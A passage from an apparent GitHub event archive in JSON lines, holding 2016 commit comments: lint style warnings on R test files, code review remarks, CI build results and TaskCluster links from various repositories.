*style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                      ^\n```\n[tests/testthat/test_exarray.R:4:25:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                        ^\n```\n[tests/testthat/test_exarray.R:4:27:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                          ^\n```\n[tests/testthat/test_exarray.R:4:29:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                            ^\n```\n[tests/testthat/test_exarray.R:4:31:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                              ^\n```\n[tests/testthat/test_exarray.R:4:33:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                ^\n```\n[tests/testthat/test_exarray.R:4:35:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                  ^\n```\n[tests/testthat/test_exarray.R:4:37:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                    ^\n```\n[tests/testthat/test_exarray.R:4:39:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                      ^\n```\n[tests/testthat/test_exarray.R:4:41:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Commas should always have a space after.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                        ^\n```\n[tests/testthat/test_exarray.R:4:49:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                               ~^~\n```\n[tests/testthat/test_exarray.R:4:58:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​    m <- matrix(c(1,1,1,2,2,2,1,1,1,3,3,3), ncol=3, byrow=TRUE)\n                                                        ~^~\n```\n[tests/testthat/test_exarray.R:6:13:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L6) *style:* **Variable and function names should be all lowercase.**\n```r\n​    eset <- ExpressionSet(m)\n            ^~~~~~~~~~~~~\n```\n[tests/testthat/test_exarray.R:7:15:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L7) *style:* **Commas should always have a space after.**\n```r\n​    gr <- c(1,1,2,2)\n              ^\n```\n[tests/testthat/test_exarray.R:7:17:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L7) *style:* **Commas should always have a space after.**\n```r\n​    gr <- c(1,1,2,2)\n                ^\n```\n[tests/testthat/test_exarray.R:7:19:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L7) *style:* **Commas should always have a space after.**\n```r\n​    gr <- c(1,1,2,2)\n                  ^\n```\n[tests/testthat/test_exarray.R:9:22:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L9) *style:* **Commas should always have a space after.**\n```r\n​    expect_equal(c(2,3), dim(exprs(red)))\n                     ^\n```\n[tests/testthat/test_exarray.R:10:53:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​    red <- eset_reduce(eset, rownames(m), gr, method=\"median\")\n                                                   ~^~\n```\n[tests/testthat/test_exarray.R:11:22:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L11) *style:* **Commas should always have a space after.**\n```r\n​    expect_equal(c(2,3), dim(exprs(red)))\n                     ^\n```\n[tests/testthat/test_exarray.R:12:53:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​    red <- eset_reduce(eset, rownames(m), gr, method=\"max\")\n                                                   ~^~\n```\n[tests/testthat/test_exarray.R:13:22:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L13) *style:* **Commas should always have a space after.**\n```r\n​    expect_equal(c(2,3), dim(exprs(red)))\n                     ^\n```\n[tests/testthat/test_exarray.R:14:47:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L14) *style:* **Commas should always have a space after.**\n```r\n​    red <- eset_reduce(eset, rownames(m), c(1,1,1,2), method=\"median\")\n                                              ^\n```\n[tests/testthat/test_exarray.R:14:49:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L14) *style:* **Commas should always have a space after.**\n```r\n​    red <- eset_reduce(eset, rownames(m), c(1,1,1,2), method=\"median\")\n                                                ^\n```\n[tests/testthat/test_exarray.R:14:51:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L14) *style:* **Commas should always have a space after.**\n```r\n​    red <- eset_reduce(eset, rownames(m), c(1,1,1,2), method=\"median\")\n                                                  ^\n```\n[tests/testthat/test_exarray.R:14:61:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​    red <- eset_reduce(eset, rownames(m), c(1,1,1,2), method=\"median\")\n                                                           ~^~\n```\n[tests/testthat/test_exarray.R:15:22:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_exarray.R#L15) *style:* **Commas should always have a space after.**\n```r\n​    expect_equal(c(2,3), dim(exprs(red)))\n                     ^\n```\n[tests/testthat/test_ml.R:5:11:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​    y <- x*3 + rnorm(100)\n         ~^~\n```\n[tests/testthat/test_ml.R:10:22:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​    expect_true(all(m>0))\n                    ~^~\n```\n[tests/testthat/test_ml.R:14:24:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​    m <- matrix(1, nrow=20, ncol=20)\n                      ~^~\n```\n[tests/testthat/test_ml.R:14:33:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​    m <- matrix(1, nrow=20, ncol=20)\n                               ~^~\n```\n[tests/testthat/test_ml.R:17:16:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​    ecols <- 20*(20+1)/2\n              ~^~\n```\n[tests/testthat/test_ml.R:17:17:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    ecols <- 20*(20+1)/2\n                ^\n```\n[tests/testthat/test_ml.R:17:20:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​    ecols <- 20*(20+1)/2\n                  ~^~\n```\n[tests/testthat/test_ml.R:17:23:](https://github.com/cdiener/proliferation/blob/65e2a6e3fcaf133fbca94c3244ecb79ba122ef82/tests/testthat/test_ml.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​    ecols <- 20*(20+1)/2\n                     ~^~\n```"}},"created_at":"2016-09-09T20:30:14Z"}
{"id":"4542234983","type":"CommitCommentEvent","actor":{"login":"VeselaKakrinska"},"repo":{"name":"VeselaKakrinska/TU-Grafik"},"payload":{"comment":{"id":18969129,"position":null,"line":null,"path":null,"commit_id":"20b145f7f16e9561a77b493b6bc58ed84c792e2f","created_at":"2016-09-09T20:30:17Z","updated_at":"2016-09-09T20:30:17Z","body":"this"}},"created_at":"2016-09-09T20:30:17Z"}
{"id":"4542238611","type":"CommitCommentEvent","actor":{"login":"bennn"},"repo":{"name":"nuprl/cs2500-server"},"payload":{"comment":{"id":18969145,"position":null,"line":null,"path":null,"commit_id":"f0eb9389b7086c0f9a02b7deb0530d5d80cc7893","created_at":"2016-09-09T20:30:59Z","updated_at":"2016-09-09T20:30:59Z","body":"The `for/list` on line 37 is building a list (of voids and booleans).\r\n\r\nThe prev. version of the code returned `email` in each iteration of the loop and returned a list of email addresses we called `(mutt ... #:to email ...)` on."}},"created_at":"2016-09-09T20:30:59Z"}
{"id":"4542238629","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969146,"position":19,"line":19,"path":"sql/CreateClientTable.sql","commit_id":"e1b244f3b4e7dcbfed9f6c2dd0646d2f5ce818f7","created_at":"2016-09-09T20:30:59Z","updated_at":"2016-09-09T20:30:59Z","body":"Are these lines nessisary? Id prefer not to define user names in these files in case we change user names"}},"created_at":"2016-09-09T20:30:59Z"}
{"id":"4542240615","type":"CommitCommentEvent","actor":{"login":"Crayder"},"repo":{"name":"Open-GTO/samp-weapon-config"},"payload":{"comment":{"id":18969152,"position":null,"line":null,"path":null,"commit_id":"80b38afc30889e74495fc69824a2caf54bb46e1a","created_at":"2016-09-09T20:31:23Z","updated_at":"2016-09-09T20:31:23Z","body":"playerid can't be changed, only the rest of the parameters can be."}},"created_at":"2016-09-09T20:31:23Z"}
{"id":"4542241369","type":"CommitCommentEvent","actor":{"login":"Maryom"},"repo":{"name":"SwiftKitz/Datez"},"payload":{"comment":{"id":18969157,"position":null,"line":null,"path":null,"commit_id":"7c479bc3842bb9fdd33b391ae14e8c5b01410387","created_at":"2016-09-09T20:31:33Z","updated_at":"2016-09-09T20:31:33Z","body":"There is an edit button at the end of the line. I think it appears just to the owner that why I can't edit it. Could you please edit it? "}},"created_at":"2016-09-09T20:31:33Z"}
{"id":"4542243264","type":"CommitCommentEvent","actor":{"login":"tmaness"},"repo":{"name":"hci-gnomex/gnomex"},"payload":{"comment":{"id":18969162,"position":null,"line":null,"path":null,"commit_id":"d5a7f72e227e55e79decb702587fd87c23767300","created_at":"2016-09-09T20:31:58Z","updated_at":"2016-09-09T20:31:58Z","body":"Very good.  I wondered about that."}},"created_at":"2016-09-09T20:31:58Z"}
{"id":"4542243987","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969165,"position":null,"line":null,"path":null,"commit_id":"09305d3234fb9810a30e9dd17b983ae9d4f4861b","created_at":"2016-09-09T20:32:07Z","updated_at":"2016-09-09T20:32:07Z","body":"Also name should be CreateGameClientsTable.sql for consistency"}},"created_at":"2016-09-09T20:32:07Z"}
{"id":"4542245311","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18969169,"position":null,"line":null,"path":null,"commit_id":"959a422addaf9e0f443b5ca5bb1e390c31e9ba7f","created_at":"2016-09-09T20:32:22Z","updated_at":"2016-09-09T20:32:22Z","body":"Related to: backdrop/backdrop-issues#1665 "}},"created_at":"2016-09-09T20:32:22Z"}
{"id":"4542245341","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18969170,"position":null,"line":null,"path":null,"commit_id":"917739c7258201ef8659f078d8c74f9fa70644c1","created_at":"2016-09-09T20:32:23Z","updated_at":"2016-09-09T20:32:23Z","body":"Related to: backdrop/backdrop-issues#1521 backdrop/backdrop-issues#1665 "}},"created_at":"2016-09-09T20:32:23Z"}
{"id":"4542245920","type":"CommitCommentEvent","actor":{"login":"mzweben"},"repo":{"name":"splicemachine/spliceengine"},"payload":{"comment":{"id":18969174,"position":null,"line":null,"path":null,"commit_id":"4d37f0301d5ab7861a101d8fa8ddfe3111c64287","created_at":"2016-09-09T20:32:29Z","updated_at":"2016-09-09T20:32:29Z","body":"+1 (but still would eventually love to see the 20000 be parameterized in config)"}},"created_at":"2016-09-09T20:32:29Z"}
{"id":"4542245933","type":"CommitCommentEvent","actor":{"login":"mayork"},"repo":{"name":"hoburg/gpkit-models"},"payload":{"comment":{"id":18969175,"position":null,"line":null,"path":null,"commit_id":"302daa6f7132923ebb91e8a7f5bf6ba8b3e800d5","created_at":"2016-09-09T20:32:29Z","updated_at":"2016-09-09T20:32:29Z","body":"I don't think I ever ran the script I just imported Aircraft from aircraft"}},"created_at":"2016-09-09T20:32:29Z"}
{"id":"4542246927","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969177,"position":null,"line":null,"path":null,"commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:32:43Z","updated_at":"2016-09-09T20:32:43Z","body":"FYI my previous comments somehow are disconnected from this (didn't have /steveharter/ in the path)"}},"created_at":"2016-09-09T20:32:43Z"}
{"id":"4542247232","type":"CommitCommentEvent","actor":{"login":"yehster"},"repo":{"name":"LibreEHR/LibreEHR"},"payload":{"comment":{"id":18969179,"position":17,"line":82,"path":"interface/main/tabs/menu/menu_data.php","commit_id":"449801d303b0aa3ccfa2c2b1a514f07787ef1531","created_at":"2016-09-09T20:32:46Z","updated_at":"2016-09-09T20:32:46Z","body":"It looks like st was put in here by mistake."}},"created_at":"2016-09-09T20:32:46Z"}
{"id":"4542247803","type":"CommitCommentEvent","actor":{"login":"atodorov"},"repo":{"name":"rhinstaller/pykickstart"},"payload":{"comment":{"id":18969180,"position":null,"line":null,"path":null,"commit_id":"929526985752a98b5c13e83d1c1210f55350d7ad","created_at":"2016-09-09T20:32:53Z","updated_at":"2016-09-09T20:32:53Z","body":"Maybe use this https://pypi.python.org/pypi/mock  as dependency for Python2 ? Also translation-canary seems to be using mock as well. How does that work under Python 2 ? "}},"created_at":"2016-09-09T20:32:53Z"}
{"id":"4542248010","type":"CommitCommentEvent","actor":{"login":"g0t4"},"repo":{"name":"boxcutter/ubuntu"},"payload":{"comment":{"id":18969182,"position":null,"line":null,"path":null,"commit_id":"249a96a65a41b1c7f9e366c905f310765cc28079","created_at":"2016-09-09T20:32:55Z","updated_at":"2016-09-09T20:32:55Z","body":"Can we keep the old images in vagrant cloud? I had some labs built on top of these and it would rock to at least keep legacy images?"}},"created_at":"2016-09-09T20:32:55Z"}
{"id":"4542249789","type":"CommitCommentEvent","actor":{"login":"Crayder"},"repo":{"name":"Open-GTO/samp-weapon-config"},"payload":{"comment":{"id":18969186,"position":null,"line":null,"path":null,"commit_id":"80b38afc30889e74495fc69824a2caf54bb46e1a","created_at":"2016-09-09T20:33:18Z","updated_at":"2016-09-09T20:33:18Z","body":"Well, it doesn't make sense to be able to be changed, but that's how it is in the forward... "}},"created_at":"2016-09-09T20:33:18Z"}
{"id":"4542249908","type":"CommitCommentEvent","actor":{"login":"inferont"},"repo":{"name":"RomanShumkov/EcentriaRestBundle"},"payload":{"comment":{"id":18969187,"position":null,"line":null,"path":null,"commit_id":"101aea955c92239d0a7f84e2930e976372c762e3","created_at":"2016-09-09T20:33:19Z","updated_at":"2016-09-09T20:33:19Z","body":"@RomanShumkov Are you still looking for someone to test and merge this?"}},"created_at":"2016-09-09T20:33:19Z"}
{"id":"4542252858","type":"CommitCommentEvent","actor":{"login":"lukeIam"},"repo":{"name":"lukeIam/GCComment"},"payload":{"comment":{"id":18969189,"position":null,"line":null,"path":null,"commit_id":"119f154a58cf6b8e0fea07a184769e1f6e8b8f4d","created_at":"2016-09-09T20:33:53Z","updated_at":"2016-09-09T20:33:53Z","body":"@Cappa-d Thank you for testing!"}},"created_at":"2016-09-09T20:33:53Z"}
{"id":"4542252915","type":"CommitCommentEvent","actor":{"login":"summerisgone"},"repo":{"name":"redsolution/django-catalog-tree"},"payload":{"comment":{"id":18969190,"position":null,"line":null,"path":null,"commit_id":"258103c4498405b3ffee5410ee0ee430e29eb534","created_at":"2016-09-09T20:33:54Z","updated_at":"2016-09-09T20:33:54Z","body":"👍 pleasantly surprised it's evolving"}},"created_at":"2016-09-09T20:33:54Z"}
{"id":"4542253678","type":"CommitCommentEvent","actor":{"login":"littledan"},"repo":{"name":"domenic/proposal-import-function"},"payload":{"comment":{"id":18969192,"position":null,"line":null,"path":null,"commit_id":"7d315a9c3228bd6482cabdab900533b3fb30af24","created_at":"2016-09-09T20:34:03Z","updated_at":"2016-09-09T20:34:03Z","body":"+1"}},"created_at":"2016-09-09T20:34:03Z"}
{"id":"4542254676","type":"CommitCommentEvent","actor":{"login":"glasser"},"repo":{"name":"meteor/docker"},"payload":{"comment":{"id":18969196,"position":93,"line":146,"path":"daemon/logger/journald/journald.go","commit_id":"ee1e57be88fdb96d33a16294c18cb92a4c5a7867","created_at":"2016-09-09T20:34:15Z","updated_at":"2016-09-09T20:34:15Z","body":"erp, this was supposed to say \"stdout and stderr separately\""}},"created_at":"2016-09-09T20:34:15Z"}
{"id":"4542254820","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18969197,"position":null,"line":null,"path":null,"commit_id":"e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966","created_at":"2016-09-09T20:34:17Z","updated_at":"2016-09-09T20:34:17Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1531 of 2080 tests passed, 0 test warnings)\n\n * 539 tests had: AUD diffs.\n * 530 tests had: EIO diffs.\n * 422 tests had: ESO small diffs.\n * 360 tests had: MTR small diffs.\n * 512 tests had: RDD diffs.\n * 497 tests had: Table big diffs.\n * 420 tests had: BND diffs.\n * 116 tests had: ESO big diffs.\n * 90 tests had: ERR diffs.\n * 76 tests had: MTR big diffs.\n * 4 tests had: SSZ big diffs.\n * 15 tests had: MDD diffs.\n * 35 tests had: MTD diffs.\n * 5 tests had: ZSZ big diffs.\n * 29 tests had: DXF diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: SHD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e27c97cdcbfc71b3269bbcc7b2a7954dd0bec966-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-73.61%25-red.svg)</a> \n"}},"created_at":"2016-09-09T20:34:17Z"}
{"id":"4542255714","type":"CommitCommentEvent","actor":{"login":"glasser"},"repo":{"name":"meteor/docker"},"payload":{"comment":{"id":18969198,"position":93,"line":146,"path":"daemon/logger/journald/journald.go","commit_id":"ee1e57be88fdb96d33a16294c18cb92a4c5a7867","created_at":"2016-09-09T20:34:27Z","updated_at":"2016-09-09T20:34:27Z","body":"not worth rebuilding docker for though"}},"created_at":"2016-09-09T20:34:27Z"}
{"id":"4542257361","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969203,"position":5,"line":5,"path":"src/System.Security.Cryptography.Csp/ref/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:34:48Z","updated_at":"2016-09-09T20:34:48Z","body":"OK that's nice to know"}},"created_at":"2016-09-09T20:34:48Z"}
{"id":"4542258601","type":"CommitCommentEvent","actor":{"login":"pweibring"},"repo":{"name":"pweibring/test-lv"},"payload":{"comment":{"id":18969206,"position":null,"line":null,"path":null,"commit_id":"48ee43414069ec66f01e6ecd9d3178804447581e","created_at":"2016-09-09T20:35:02Z","updated_at":"2016-09-09T20:35:02Z","body":"Added I8 conversion. What are you doing you cannot commit directly to the master branch?"}},"created_at":"2016-09-09T20:35:02Z"}
{"id":"4542258804","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18969207,"position":null,"line":null,"path":null,"commit_id":"0509e6f916a564ed4b1ae18a8d93892f5a69cc05","created_at":"2016-09-09T20:35:05Z","updated_at":"2016-09-09T20:35:05Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cH8vrZ81SE-YnV8Z6wmjbw"}},"created_at":"2016-09-09T20:35:05Z"}
{"id":"4542259843","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969209,"position":5,"line":2,"path":"sql/CreateGameResultTable.sql","commit_id":"70bd74a4a3c218218ec34e577ca6d0a2786d4a4c","created_at":"2016-09-09T20:35:18Z","updated_at":"2016-09-09T20:35:18Z","body":"no reason for it to just be `id`"}},"created_at":"2016-09-09T20:35:18Z"}
{"id":"4542260441","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18969211,"position":null,"line":null,"path":null,"commit_id":"0509e6f916a564ed4b1ae18a8d93892f5a69cc05","created_at":"2016-09-09T20:35:25Z","updated_at":"2016-09-09T20:35:25Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Eywjjb2NTR-6aFau79fs9w"}},"created_at":"2016-09-09T20:35:25Z"}
{"id":"4542261310","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":18969214,"position":null,"line":null,"path":null,"commit_id":"0509e6f916a564ed4b1ae18a8d93892f5a69cc05","created_at":"2016-09-09T20:35:34Z","updated_at":"2016-09-09T20:35:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WasMgnv8RY-IURVjn1QpPQ"}},"created_at":"2016-09-09T20:35:34Z"}
{"id":"4542261948","type":"CommitCommentEvent","actor":{"login":"ericnelson0"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18969216,"position":5,"line":571,"path":"app/scripts/minmax/dimMinMax.controller.js","commit_id":"25c51bdad475f0baf0297ca2e7e43f23b61a0a9f","created_at":"2016-09-09T20:35:41Z","updated_at":"2016-09-09T20:35:41Z","body":"Should be <code>&& item.stats.length</code>, right?"}},"created_at":"2016-09-09T20:35:41Z"}
{"id":"4542265941","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":18969225,"position":15,"line":7,"path":"sql/CreateGameResultTable.sql","commit_id":"70bd74a4a3c218218ec34e577ca6d0a2786d4a4c","created_at":"2016-09-09T20:36:26Z","updated_at":"2016-09-09T20:36:26Z","body":"`gamelog_id`\r\n\r\nan actual gamelog would be the actual full 2MB JSON object"}},"created_at":"2016-09-09T20:36:26Z"}
{"id":"4542266230","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969228,"position":37,"line":22,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:36:30Z","updated_at":"2016-09-09T20:36:30Z","body":"I will remove it, but net463 implements ns1.6 so wasn't sure how this worked"}},"created_at":"2016-09-09T20:36:30Z"}
{"id":"4542267437","type":"CommitCommentEvent","actor":{"login":"Mazyod"},"repo":{"name":"SwiftKitz/Datez"},"payload":{"comment":{"id":18969230,"position":null,"line":null,"path":null,"commit_id":"7c479bc3842bb9fdd33b391ae14e8c5b01410387","created_at":"2016-09-09T20:36:46Z","updated_at":"2016-09-09T20:36:46Z","body":"Oh, the repo description, lol. Sorry, I was searching in the readme file. Thanks!"}},"created_at":"2016-09-09T20:36:46Z"}
{"id":"4542267965","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18969232,"position":61,"line":46,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T20:36:53Z","updated_at":"2016-09-09T20:36:53Z","body":"I needed it otherwise I get a compile message about it??"}},"created_at":"2016-09-09T20:36:53Z"}
{"id":"4542271247","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18969242,"position":null,"line":null,"path":null,"commit_id":"4b5008de52888efa9d32d8c780590e738541eb32","created_at":"2016-09-09T20:37:33Z","updated_at":"2016-09-09T20:37:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QRwTOSwTTQKW-SrewlhEZA"}},"created_at":"2016-09-09T20:37:33Z"}
{"id":"4542274439","type":"CommitCommentEvent","actor":{"login":"snolflake"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18969251,"position":31,"line":31,"path":"src/app/app.service.ts","commit_id":"5dffc76b638adad74a2df59f9dfb75d92a44b76d","created_at":"2016-09-09T20:38:12Z","updated_at":"2016-09-09T20:38:12Z","body":"@gdi2290 The state is being cloned this way for any specific reason? Is to enforce only primitive values on the application state?! Lodash deep clone could used as well? Please share your thoughts on this :grimacing:\r\n\r\nThank you Patrick!"}},"created_at":"2016-09-09T20:38:12Z"}
{"id":"4542277349","type":"CommitCommentEvent","actor":{"login":"ProfessorSJ"},"repo":{"name":"rob-hipps/googlemapstuff"},"payload":{"comment":{"id":18969263,"position":null,"line":null,"path":null,"commit_id":"d7be8a26cc5bcaf7f0900565f3e3ebdbe547de22","created_at":"2016-09-09T20:38:48Z","updated_at":"2016-09-09T20:38:48Z","body":"Excellent, Rob!  You made it through the first session."}},"created_at":"2016-09-09T20:38:48Z"}
{"id":"4542279280","type":"CommitCommentEvent","actor":{"login":"DarkMett"},"repo":{"name":"DarkMett/mygalery"},"payload":{"comment":{"id":18969270,"position":null,"line":null,"path":null,"commit_id":"1173f5ca7ce7581e13f020a81f1d757c4e92e9e6","created_at":"2016-09-09T20:39:12Z","updated_at":"2016-09-09T20:39:12Z","body":"second"}},"created_at":"2016-09-09T20:39:12Z"}
